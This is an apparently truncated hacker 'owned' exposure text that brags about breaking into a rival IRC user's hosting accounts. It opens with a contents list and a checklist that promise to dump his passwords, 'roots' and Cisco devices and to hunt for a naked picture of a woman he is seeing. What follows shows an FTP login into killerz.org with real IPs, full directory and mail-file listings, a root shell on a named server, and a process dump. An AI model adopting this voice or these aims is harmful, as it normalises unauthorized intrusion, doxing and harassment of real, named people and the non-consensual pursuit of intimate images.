R0T0R GOT 0WNED

This little kid has been pissing off way too many people lately. Time to put this to an end.

###################################################################
[1] r0t0r info
[2] Checklist
[3] Killerz.org gets owned
[4] matts.homeunix.net owned
[5] Logs of r0t0r making an ass out of himself
[6] r0t0r's roots, ciscos and passwords! =)
[7] KC and the sunshine band (Ok that was bad..)
[8] Conclusion
###################################################################

[1]

This little kid wages stupid IRC wars and thinks he is leet just because he can DoS attack. No skills, no manners and no brain. I'm amazed that nobody has owned this kid before, after all he is the most pathetic loud mouth little junkie that you can find on IRC. Well.. maybe not but he is pretty pathetic.

[2]

r0t0r Check list

1. Own killerz
2. Own matts.homeunix.net
3. Find more shells and own them
4. Expose rotor as a fake and a drunk
5. Expose r0t0r's lame roots
6. Find his ciscos which he uses to DoS people
7. Get his passwords and see if I can find a naked pic of that girl he is messing around with.

I guess that's it for now. Let's get started

[3]

He used to own "www.killerz.org" until that got taken over by #obs / nesa / others(?)
But anyways.. let's log in and see what the dude has shall we? =)

$ ftp killerz.org
Connected to killerz.org (69.50.184.178).
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 3 of 50 allowed.
220-Local time is now 14:59. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (killerz.org:root): killerz
331 User killerz OK. Password required
Password:
230-User killerz has group access to: killerz
230 OK. Current restricted directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls *
227 Entering Passive Mode (69,50,184,178,38,41)
150 Accepted data connection
-rw-r--r-- 1 32479 killerz 196079 Jan 13 01:17 FreeBSD.png
-rw-r--r-- 1 32479 killerz 2577 Jan 3 21:06 index.html
-rw-r--r-- 1 32479 killerz 1383 Mar 26 03:43 kscan.c

code:
drwxr-xr-x 2 32479 killerz 4096 Dec 19 19:07 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
-rw-r--r-- 1 32479 killerz 507 Dec 19 19:07 coolPHP.txt

etc:
drwxr-x--- 3 32479 12 4096 Dec 17 13:09 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
-rw-r--r-- 1 32479 killerz 0 Dec 17 13:00 .imapv4cp5c
-rw-r--r-- 1 32479 killerz 0 Dec 17 13:09 ftpquota
drwxr-x--- 2 32479 12 4096 Mar 28 01:29 killerz.org

mail:
drwxrwx--- 3 32479 12 4096 Apr 6 07:57 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
-rw-rw---- 1 32479 12 508 Jan 9 18:54 INBOX.Drafts
-rw-rw---- 1 32479 12 1351 Jan 9 21:14 INBOX.Sent
-rw-rw---- 1 32479 12 714071 Jan 9 18:58 INBOX.Trash
-rw-rw---- 1 32479 12 7203732 Apr 6 07:57 inbox
drwxr-xr-x 3 32479 12 4096 Dec 17 04:19 killerz.org
-rw-rw---- 1 32479 12 210853 Jan 9 18:53 neomail-trash
-rw-rw---- 1 32479 12 0 Dec 19 22:38 saved-messages
-rw-rw---- 1 32479 12 426549 Jan 9 18:54 sent-mail

public_ftp:
drwxr-xr-x 3 32479 killerz 4096 Dec 15 14:52 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:52 incoming

public_html:
drwxr-x--- 30 32479 99 4096 Apr 6 14:45 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
-rw-r--r-- 1 32479 killerz 356 Dec 15 14:53 .htaccess
-rw-r--r-- 1 32479 killerz 332394 Mar 20 20:33 0x41.tgz
drwxr-xr-x 2 32479 killerz 4096 Jan 13 01:14 FreeBSD
-rw-r--r-- 1 32479 killerz 30720 Jan 28 12:29 FreeBSD.png
-rw-r--r-- 1 32479 killerz 458 Dec 31 03:33 LOL.html
-rw-r--r-- 1 32479 killerz 147448 Mar 28 04:58 Scan0007.jpg
-rw-r--r-- 1 32479 killerz 10240 Dec 17 13:14 Thumbs.db
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _private
drwxr-xr-x 4 32479 killerz 4096 Dec 15 14:53 _vti_bin
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_cnf
-rw-r--r-- 1 32479 killerz 1754 Dec 15 14:53 _vti_inf.html
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_log
drwxr-x--- 2 32479 99 4096 Mar 28 01:16 _vti_pvt
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_txt
drwxrwxrwx 5 32479 killerz 4096 Dec 31 01:36 abicons
-rw-r--r-- 1 32479 killerz 373 Dec 30 22:49 b4b0.php
-rw-r--r-- 1 32479 killerz 5307 Mar 31 14:21 c0n3ct.c
drwxr-xr-x 2 32479 killerz 4096 Dec 26 21:35 cam2
drwxr-xr-x 3 32479 killerz 4096 Dec 31 01:35 cgi-bin
drwxr-xr-x 2 32479 killerz 4096 Jan 9 22:39 code
drwxr-xr-x 5 32479 killerz 4096 Dec 25 15:16 cutenews
drwxr-xr-x 2 32479 killerz 4096 Dec 26 20:51 ebay
drwxr-xr-x 4 32479 killerz 4096 Dec 22 18:35 electronics
drwxr-xr-x 3 32479 killerz 4096 Mar 19 00:37 fileupload
drwxr-xr-x 2 32479 killerz 4096 Apr 4 21:43 fuck
-rw-r--r-- 1 32479 killerz 5298 Mar 21 17:45 hawe
drwxr-xr-x 2 32479 killerz 4096 Dec 24 04:09 images
-rw-r--r-- 1 32479 killerz 2568 Mar 19 01:22 index.php
drwxr-xr-x 2 32479 killerz 4096 Dec 17 13:13 index_files
drwxr-xr-x 3 32479 killerz 4096 Dec 19 19:51 irc
-rw-r--r-- 1 32479 killerz 921 Jan 4 03:58 kdoor.txt
-rw-r--r-- 1 32479 killerz 1776 Mar 24 05:16 klog.txt
-rw-r--r-- 1 32479 killerz 1994 Apr 5 02:31 kscan.c
drwxr-xr-x 2 32479 killerz 4096 Dec 17 14:49 music
-rw-r--r-- 1 32479 killerz 1390 Mar 20 02:56 netit
-rw-r--r-- 1 32479 killerz 5123 Mar 20 03:01 netstat.txt
drwxr-xr-x 4 32479 killerz 4096 Dec 24 03:20 newlay
-rw-r--r-- 1 32479 killerz 133435 Mar 22 02:55 newss.GIF
drwxr-xr-x 2 32479 killerz 4096 Dec 22 18:32 papers
drwxr-xr-x 4 32479 killerz 4096 Mar 18 23:46 pastebin
-rwxr-xr-x 1 32479 killerz 6625 Mar 18 23:47 pastebin.pl
drwxr-xr-x 10 32479 killerz 4096 Dec 17 13:01 phpBB
drwxr-xr-x 5 32479 killerz 4096 Jan 17 17:52 pics
-rw-r--r-- 1 32479 killerz 2448 Dec 15 14:53 postinfo.html
drwxr-xr-x 2 32479 killerz 4096 Mar 26 19:49 r00t
drwxr-xr-x 3 32479 killerz 4096 Mar 17 23:50 scamz
-rw-r--r-- 1 32479 killerz 2777 Mar 25 02:54 shelld.c
-rw-r--r-- 1 32479 killerz 1123 Mar 23 23:58 tsniff.txt
drwxr-xr-x 5 32479 killerz 4096 Mar 28 22:40 ~techg0d

tmp:
drwx------ 6 32479 killerz 4096 Dec 29 11:10 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
drwx------ 4 32479 killerz 4096 Apr 3 18:28 analog
drwx------ 2 32479 killerz 4096 Apr 3 18:28 awstats
-rw-r--r-- 1 32479 killerz 0 Apr 3 18:28 lastrun
-rw-r--r-- 1 32479 killerz 0 Apr 4 06:48 lastrun.bw
drwx------ 4 32479 killerz 4096 Apr 1 17:07 webalizer
drwx------ 2 32479 killerz 4096 Mar 18 02:04 webalizerftp

www:
drwxr-x--- 30 32479 99 4096 Apr 6 14:45 .
drwx--x--x 12 32479 killerz 4096 Apr 6 14:38 ..
-rw-r--r-- 1 32479 killerz 356 Dec 15 14:53 .htaccess
-rw-r--r-- 1 32479 killerz 332394 Mar 20 20:33 0x41.tgz
drwxr-xr-x 2 32479 killerz 4096 Jan 13 01:14 FreeBSD
-rw-r--r-- 1 32479 killerz 30720 Jan 28 12:29 FreeBSD.png
-rw-r--r-- 1 32479 killerz 458 Dec 31 03:33 LOL.html
-rw-r--r-- 1 32479 killerz 147448 Mar 28 04:58 Scan0007.jpg
-rw-r--r-- 1 32479 killerz 10240 Dec 17 13:14 Thumbs.db
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _private
drwxr-xr-x 4 32479 killerz 4096 Dec 15 14:53 _vti_bin
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_cnf
-rw-r--r-- 1 32479 killerz 1754 Dec 15 14:53 _vti_inf.html
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_log
drwxr-x--- 2 32479 99 4096 Mar 28 01:16 _vti_pvt
drwxr-xr-x 2 32479 killerz 4096 Dec 15 14:53 _vti_txt
drwxrwxrwx 5 32479 killerz 4096 Dec 31 01:36 abicons
-rw-r--r-- 1 32479 killerz 373 Dec 30 22:49 b4b0.php
-rw-r--r-- 1 32479 killerz 5307 Mar 31 14:21 c0n3ct.c
drwxr-xr-x 2 32479 killerz 4096 Dec 26 21:35 cam2
drwxr-xr-x 3 32479 killerz 4096 Dec 31 01:35 cgi-bin
drwxr-xr-x 2 32479 killerz 4096 Jan 9 22:39 code
drwxr-xr-x 5 32479 killerz 4096 Dec 25 15:16 cutenews
drwxr-xr-x 2 32479 killerz 4096 Dec 26 20:51 ebay
drwxr-xr-x 4 32479 killerz 4096 Dec 22 18:35 electronics
drwxr-xr-x 3 32479 killerz 4096 Mar 19 00:37 fileupload
drwxr-xr-x 2 32479 killerz 4096 Apr 4 21:43 fuck
-rw-r--r-- 1 32479 killerz 5298 Mar 21 17:45 hawe
drwxr-xr-x 2 32479 killerz 4096 Dec 24 04:09 images
-rw-r--r-- 1 32479 killerz 2568 Mar 19 01:22 index.php
drwxr-xr-x 2 32479 killerz 4096 Dec 17 13:13 index_files
drwxr-xr-x 3 32479 killerz 4096 Dec 19 19:51 irc
-rw-r--r-- 1 32479 killerz 921 Jan 4 03:58 kdoor.txt
-rw-r--r-- 1 32479 killerz 1776 Mar 24 05:16 klog.txt
-rw-r--r-- 1 32479 killerz 1994 Apr 5 02:31 kscan.c
drwxr-xr-x 2 32479 killerz 4096 Dec 17 14:49 music
-rw-r--r-- 1 32479 killerz 1390 Mar 20 02:56 netit
-rw-r--r-- 1 32479 killerz 5123 Mar 20 03:01 netstat.txt
drwxr-xr-x 4 32479 killerz 4096 Dec 24 03:20 newlay
-rw-r--r-- 1 32479 killerz 133435 Mar 22 02:55 newss.GIF
drwxr-xr-x 2 32479 killerz 4096 Dec 22 18:32 papers
drwxr-xr-x 4 32479 killerz 4096 Mar 18 23:46 pastebin
-rwxr-xr-x 1 32479 killerz 6625 Mar 18 23:47 pastebin.pl
drwxr-xr-x 10 32479 killerz 4096 Dec 17 13:01 phpBB
drwxr-xr-x 5 32479 killerz 4096 Jan 17 17:52 pics
-rw-r--r-- 1 32479 killerz 2448 Dec 15 14:53 postinfo.html
drwxr-xr-x 2 32479 killerz 4096 Mar 26 19:49 r00t
drwxr-xr-x 3 32479 killerz 4096 Mar 17 23:50 scamz
-rw-r--r-- 1 32479 killerz 2777 Mar 25 02:54 shelld.c
-rw-r--r-- 1 32479 killerz 1123 Mar 23 23:58 tsniff.txt
drwxr-xr-x 5 32479 killerz 4096 Mar 28 22:40 ~techg0d

## Well.. ftp access is good and all... but I want more

root@panther [/root]# uname -a; id
Linux panther.unixbsd.info 2.6.10-grsec #2 Sun Jan 9 16:59:21 PST 2005 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) groups=XXXX(XXXXXXXXX)

## There we go! :)

root@panther [/tmp]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1540 500 ? S Apr04 0:06 init [3]
root 2 0.0 0.0 0 0 ? SWN Apr04 0:02 [ksoftirqd/0]
root 3 0.0 0.0 0 0 ? SW< Apr04 0:00 [events/0]
root 4 0.0 0.0 0 0 ? SW< Apr04 0:00 [khelper]
root 22 0.0 0.0 0 0 ? SW< Apr04 0:13 [kblockd/0]
root 52 0.0 0.0 0 0 ? SW Apr04 0:00 [kapmd]
root 72 0.0 0.0 0 0 ? SW Apr04 0:00 [pdflush]
root 75 0.0 0.0 0 0 ? SW< Apr04 0:00 [aio/0]
root 74 0.0 0.0 0 0 ? SW Apr04 0:54 [kswapd0]
root 662 0.0 0.0 0 0 ? SW Apr04 0:00 [kseriod]
root 767 0.0 0.0 0 0 ? SW Apr04 2:44 [kjournald]
root 1565 0.0 0.0 0 0 ? SW Apr04 0:00 [kjournald]
root 1911 0.0 0.0 0 0 ? SW Apr04 0:00 [khpsbpkt]
root 2633 0.0 0.0 1596 572 ? S Apr04 0:52 syslogd -m 0
root 2637 0.0 0.0 1548 496 ? S Apr04 0:01 klogd -x
root 2736 0.0 0.1 10516 2008 ? S Apr04 0:01 /usr/sbin/snmpd -s -l /dev/null -P /var/run/snmpd -a
root 4221 0.0 0.1 8520 1380 ? S Apr04 0:00 cupsd
root 4514 0.0 0.1 3668 1376 ? SN Apr04 0:11 /usr/sbin/sshd
root 4559 0.0 0.0 2152 796 ? S Apr04 0:01 xinetd -stayalive -pidfile /var/run/xinetd.pid
postgres 4600 0.0 0.1 10960 1708 ? S Apr04 0:00 /usr/bin/postmaster -p 5432 -D /var/lib/pgsql/data
postgres 4601 0.0 0.1 10244 1472 ? S Apr04 0:00 postgres: stats buffer process
postgres 4602 0.0 0.1 9252 1512 ? S Apr04 0:00 postgres: stats collector process
root 4605 0.0 0.1 7024 1644 ? SN Apr04 0:07 sshd: root@pts/0
root 4626 0.0 0.1 7192 1936 ? S Apr04 0:06 chkservd
root 4690 0.0 0.1 5336 1284 pts/0 S Apr04 0:00 -bash
root 4724 0.2 0.7 43220 7812 ? S Apr04 13:31 /usr/sbin/clamd
mailnull 4735 0.0 0.1 6636 1752 ? SN Apr04 0:22 /usr/sbin/exim -bd -q60m
mailnull 4740 0.0 0.1 6636 1748 ? SN Apr04 0:00 /usr/sbin/exim -tls-on-connect -bd -oX 465
root 4746 0.0 0.1 2976 1492 ? S Apr04 4:10 antirelayd
root 4754 0.0 1.6 20188 17584 ? SN Apr04 1:53 /usr/local/apache/bin/httpd -DSSL
root 4762 0.0 0.3 11296 3484 ? SN Apr04 1:54 cppop - accepting on port 110
root 4844 0.0 0.1 6932 1720 ? SN Apr04 0:01 pure-ftpd (SERVER)
root 4847 0.0 0.0 6672 864 ? S Apr04 0:00 /usr/sbin/pure-authd -s /var/run/ftpd.sock -r /usr/sbin/pureauth
root 4878 0.0 0.0 1612 668 ? S Apr04 0:00 crond
root 4894 0.0 0.0 5328 1028 ? S Apr04 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid
xfs 4943 0.0 0.0 5100 736 ? S Apr04 0:00 xfs -droppriv -daemon
mysql 4946 0.0 7.8 93980 81004 ? SN Apr04 0:36 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
daemon 4956 0.0 0.0 1592 560 ? S Apr04 0:00 /usr/sbin/atd
mysql 4963 0.0 7.8 93980 81004 ? SN Apr04 0:00 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 4971 0.0 7.8 93980 81004 ? SN Apr04 1:19 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 5132 0.1 7.8 93980 81004 ? SN Apr04 6:30 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 5375 0.0 7.8 93980 81004 ? SN Apr04 5:27 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mailnull 5376 0.0 0.3 5872 3448 ? SN Apr04 0:36 /usr/bin/perl /usr/local/cpanel/bin/eximstats
mysql 5377 0.1 7.8 93980 81004 ? SN Apr04 6:01 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
root 5381 0.0 0.1 9528 1968 ? S Apr04 0:16 cpsrvd - waiting for connections
mysql 5395 0.0 7.8 93980 81004 ? SN Apr04 5:18 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
root 5398 0.3 6.7 77676 69432 ? SN Apr04 21:43 cpanellogd - setting up logs for vinniej
mysql 5403 0.0 7.8 93980 81004 ? SN Apr04 5:19 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
root 5404 0.0 0.1 8172 1624 ? SN Apr04 0:00 cppop - accepting on port 110
nobody 5408 0.0 0.1 3444 1384 ? S Apr04 0:00 entropychat
nobody 5412 0.0 0.0 1904 884 ? SN Apr04 0:00 /usr/local/cpanel/bin/startmelange
cpanel 5442 0.0 0.1 36836 1888 ? SN Apr04 0:00 /usr/bin/stunnel-4.04local /usr/local/cpanel/etc/stunnel/default/stunnel.conf
root 5470 0.0 0.0 1600 468 ? SN Apr04 0:00 jsvc.exec -user tomcat -cp ./bootstrap.jar -Djava.endorsed.dirs=../common/endorsed org.apache.catalina.startup.Bootstrap -debug -outfile ../logs/catalina.out -errfile ..
tomcat 5471 0.0 1.3 244916 13680 ? SN Apr04 1:43 jsvc.exec -user tomcat -cp ./bootstrap.jar -Djava.endorsed.dirs=../common/endorsed org.apache.catalina.startup.Bootstrap -debug -outfile ../logs/catalina.out -errfile ..
mailman 5476 0.0 0.2 7348 2100 ? SN Apr04 0:00 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/mailmanctl -s start
mailman 5489 0.0 0.2 7176 2164 ? SN Apr04 0:08 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=ArchRunner:0:1 -s
mailman 5490 0.0 0.2 7136 2192 ? SN Apr04 0:09 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=BounceRunner:0:1 -s
mailman 5491 0.0 0.2 7128 2112 ? SN Apr04 0:08 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=CommandRunner:0:1 -s
mailman 5492 0.0 0.2 7220 2164 ? SN Apr04 0:08 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=IncomingRunner:0:1 -s
mailman 5493 0.0 0.2 7216 2184 ? SN Apr04 0:08 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=NewsRunner:0:1 -s
mailman 5494 0.0 0.3 7320 4084 ? SN Apr04 0:09 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=OutgoingRunner:0:1 -s
mailman 5495 0.0 0.4 7176 4308 ? SN Apr04 0:11 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=VirginRunner:0:1 -s
mailman 5496 0.0 0.2 7176 2080 ? SN Apr04 0:00 /usr/bin/python2 /usr/local/cpanel/3rdparty/mailman/bin/qrunner --runner=RetryRunner:0:1 -s
root 5510 0.0 0.0 1700 716 ? S Apr04 0:00 /usr/sbin/portsentry -tcp
root 5531 0.0 0.0 1596 420 ? S Apr04 0:00 mdadm --monitor --scan -f
root 5557 0.0 0.0 1532 400 tty1 S Apr04 0:00 /sbin/mingetty tty1
root 5558 0.0 0.0 1532 400 tty2 S Apr04 0:00 /sbin/mingetty tty2
root 5559 0.0 0.0 1532 400 tty3 S Apr04 0:00 /sbin/mingetty tty3
root 5560 0.0 0.0 1532 400 tty4 S Apr04 0:00 /sbin/mingetty tty4
root 5561 0.0 0.0 1532 400 tty5 S Apr04 0:00 /sbin/mingetty tty5
root 5562 0.0 0.0 1532 400 tty6 S Apr04 0:00 /sbin/mingetty tty6
named 6917 0.0 0.5 33080 5512 ? S Apr04 0:37 /usr/sbin/named -u named
mysql 14176 0.1 7.8 93980 81004 ? SN Apr04 6:48 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 18195 0.1 7.8 93980 81004 ? SN Apr04 6:28 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 4745 0.0 7.8 93980 81004 ? SN Apr05 4:51 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 15352 0.0 7.8 93980 81004 ? SN Apr05 4:47 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 27221 0.0 7.8 93980 81004 ? SN Apr05 4:44 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 27222 0.0 7.8 93980 81004 ? SN Apr05 5:07 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 27223 0.1 7.8 93980 81004 ? SN Apr05 5:50 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 27224 0.0 7.8 93980 81004 ? SN Apr05 4:46 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 29564 0.0 7.8 93980 81004 ? SN Apr05 5:20 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 31976 0.0 7.8 93980 81004 ? SN Apr05 3:21 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 2723 0.0 7.8 93980 81004 ? SN Apr05 3:13 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
root 13889 0.0 0.0 0 0 ? SW Apr06 0:22 [pdflush]
root 32694 0.0 0.2 6880 2128 ? SN Apr06 0:00 sshd: root@pts/1
root 32711 0.0 0.1 5332 1344 pts/1 S Apr06 0:00 -bash
mysql 14337 0.0 7.8 93980 81004 ? SN Apr07 0:51 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 14345 0.0 7.8 93980 81004 ? SN Apr07 0:54 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 14349 0.0 7.8 93980 81004 ? SN Apr07 0:53 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 14362 0.0 7.8 93980 81004 ? SN Apr07 0:52 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 14363 0.0 7.8 93980 81004 ? SN Apr07 0:55 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 14364 0.0 7.8 93980 81004 ? SN Apr07 0:52 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 14365 0.0 7.8 93980 81004 ? SN Apr07 0:50 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 14366 0.0 7.8 93980 81004 ? SN Apr07 0:51 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 14367 0.0 7.8 93980 81004 ? SN Apr07 0:52 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 14388 0.0 7.8 93980 81004 ? SN Apr07 0:50 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 14432 0.0 7.8 93980 81004 ? SN Apr07 0:55 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 14435 0.0 7.8 93980 81004 ? SN Apr07 0:56 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 14436 0.0 7.8 93980 81004 ? SN Apr07 0:52 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 14438 0.0 7.8 93980 81004 ? SN Apr07 0:54 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 14439 0.0 7.8 93980 81004 ? SN Apr07 0:56 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
mysql 14440 0.0 7.8 93980 81004 ? SN Apr07 0:53 /usr/sbin/mysqld --basedir=/ --datadir=/var/lib/mysql --user=mysql --pid-file=/var/lib/mysql/panther.unixbsd.info.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
root 14473 0.2 0.1 5352 1432 pts/0 S Apr07 5:20 top
root 13105 0.0 0.3 8100 3492 ? SN Apr07 0:00 /usr/bin/perl /usr/local/cpanel/bin/leechprotect
nobody 13106 0.1 2.2 26460 22936 ? SN Apr07 1:53 /usr/local/apache/bin/httpd -DSSL
nobody 13107 0.1 1.8 21436 19128 ? SN Apr07 2:12 /usr/local/apache/bin/httpd -DSSL
nobody 13108 0.1 1.8 22068 19616 ? SN Apr07 2:00 /usr/local/apache/bin/httpd -DSSL
nobody 13124 0.1 2.6 32388 27596 ? SN Apr07 1:58 /usr/local/apache/bin/httpd -DSSL
nobody 13125 0.1 2.2 27076 23312 ? SN Apr07 1:47 /usr/local/apache/bin/httpd -DSSL
nobody 13197 0.1 2.3 28160 24228 ? SN Apr07 1:56 /usr/local/apache/bin/httpd -DSSL
nobody 13227 0.1 2.2 26368 22980 ? SN Apr07 2:03 /usr/local/apache/bin/httpd -DSSL
nobody 13487 0.1 1.9 23524 20508 ? SN Apr07 2:08 /usr/local/apache/bin/httpd -DSSL
nobody 13798 0.1 2.4 28588 25068 ? SN Apr07 1:53 /usr/local/apache/bin/httpd -DSSL
nobody 13844 0.1 2.4 29248 25216 ? SN Apr07 2:07 /usr/local/apache/bin/httpd -DSSL
schawo 21293 0.0 0.1 2864 1376 ? S Apr08 0:00 imapd
livecart 23015 0.0 0.1 2664 1148 ? S Apr08 0:00 imapd
livecart 23016 0.0 0.1 2900 1496 ? S Apr08 0:00 imapd
root 26839 0.0 1.9 21956 20120 ? SN 00:41 0:00 /usr/bin/spamd -d --allowed-ips=127.0.0.1 --pidfile=/var/run/spamd.pid --max-children=5
root 26881 0.0 2.0 23460 21712 ? SN 00:42 0:01 spamd child
root 26882 0.0 2.1 23544 21792 ? SN 00:42 0:01 spamd child
root 26883 0.0 2.1 23792 22088 ? SN 00:42 0:01 spamd child
